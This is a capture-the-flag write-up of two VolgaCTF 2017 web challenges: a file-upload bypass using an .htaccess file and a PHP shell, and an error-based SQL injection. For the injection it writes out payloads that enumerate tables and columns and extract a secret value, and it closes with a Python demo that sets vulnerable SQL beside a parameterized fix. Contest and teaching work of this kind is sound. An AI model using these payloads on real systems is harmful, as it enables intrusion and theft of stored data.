Monday 27 March 2017

Share Points VolgaCTF 2017

Web 200pts

Share Point
Look! I wrote a good service for sharing your files with your friends, enjoy)
share-point.quals.2017.volgactf.ru

The link leads you to a website where you have to log in to continue. I logged in
with a custom username and password. Now you can upload and share your images.

There was a file upload vulnerability. Using that vulnerability, you can upload
any image and then have it treated as a PHP file. For that, I first uploaded my .htaccess file. Next I uploaded a PHP shell to print the flag. Then I went to Files and I could see both of my files.
I opened file.php.jpg to read the flag. The flag was VolgaCTF{AnoTHer_apProOAch_to_file_UplOAd_PhP}
 

Bloody Feedback, VolgaCTF 2017

Web 100pts

Bloody Feedback
Send your feedback at bloody-feedback.quals.2017.volgactf.ru
DO. NOT. USE. SQLMAP
Otherwise your IP will be banned

We are given a feedback form to submit a name, email and message; the email field was disabled by default.

After playing around for a while I figured out that the feedback we submit without an email is only displayed in Top messages. So there should be something with the email. I opened the request in Burp and modified the email to test@test.com' and I got this error:

After googling the error I found that the database is PostgreSQL. So I intercepted the requests and modified them using Burp.
name=test&email=test@test.com',(select table_name from information_schema.tables limit 1 offset 1))-- -&message=test
The table name was s3cret_tabl3.

name=test&email=test@test.com',(select column_name from information_schema.columns where table_name like ('s3cret_tabl3') limit 1 offset 0))-- -&message=test
The column name is s3cr3tc0lumn.


Combining both:
name=test&email=test@test.com',(select s3cr3tc0lumn from s3cret_tabl3 limit 1 offset 4))-- -&message=test
And the flag was VolgaCTF{eiU7UJhyeu@ud3*}
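The injection above works because the email value is pasted straight into an INSERT statement, so a quote closes the literal and the rest of the VALUES list is rewritten. As an added example (not from the write-up or the challenge), here is a constructed minimal feedback handler in Python with SQLite standing in for PostgreSQL, showing the vulnerable concatenation beside its parameterized fix; the sqlite_master subquery is the SQLite analogue of the information_schema query, and the table and column names are assumptions.

```python
import sqlite3

# Constructed payload in the shape used in the write-up: it closes the email
# literal, supplies the third VALUES entry as a subquery, then comments out
# the rest of the statement with "-- -".
PAYLOAD = "test@test.com',(select name from sqlite_master limit 1))-- -"

def make_db():
    # Assumed schema for the feedback form (name, email, message).
    db = sqlite3.connect(":memory:")
    db.execute("create table feedback(name text, email text, message text)")
    return db

def insert_vulnerable(db, name, email, message):
    # String formatting: the user input becomes part of the SQL text, so a
    # lone apostrophe raises a syntax error (what the write-up saw) and a
    # crafted value changes what is stored in the message column.
    sql = ("insert into feedback(name, email, message) "
           "values ('%s', '%s', '%s')" % (name, email, message))
    db.execute(sql)
    db.commit()

def insert_safe(db, name, email, message):
    # Parameterized query: values are bound by the driver and are never
    # parsed as SQL, so the payload is stored literally in the email column.
    db.execute("insert into feedback(name, email, message) values (?, ?, ?)",
               (name, email, message))
    db.commit()

def stored_row(db, name):
    # Returns (email, message) for the given name, for inspection.
    return db.execute("select email, message from feedback where name = ?",
                      (name,)).fetchone()

if __name__ == "__main__":
    db = make_db()
    insert_vulnerable(db, "vuln", PAYLOAD, "test")
    insert_safe(db, "safe", PAYLOAD, "test")
    print(stored_row(db, "vuln"))   # message column holds the subquery result
    print(stored_row(db, "safe"))   # payload stored verbatim as the email
```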